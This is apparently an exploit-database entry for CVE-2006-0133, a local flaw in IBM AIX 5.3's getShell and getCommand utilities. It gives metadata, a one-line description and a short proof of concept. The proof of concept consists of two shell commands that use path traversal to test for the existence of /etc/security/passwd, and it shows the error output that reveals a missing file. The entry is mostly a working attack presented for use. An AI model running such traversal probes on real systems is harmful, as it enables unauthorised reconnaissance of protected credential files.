IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration
Author: xfocus
type: local
platform: aix
port: nan
date_added: 2005-12-30
date_updated: 2013-07-22
verified: 1
codes: CVE-2006-0133;OSVDB-22422
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/16102/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory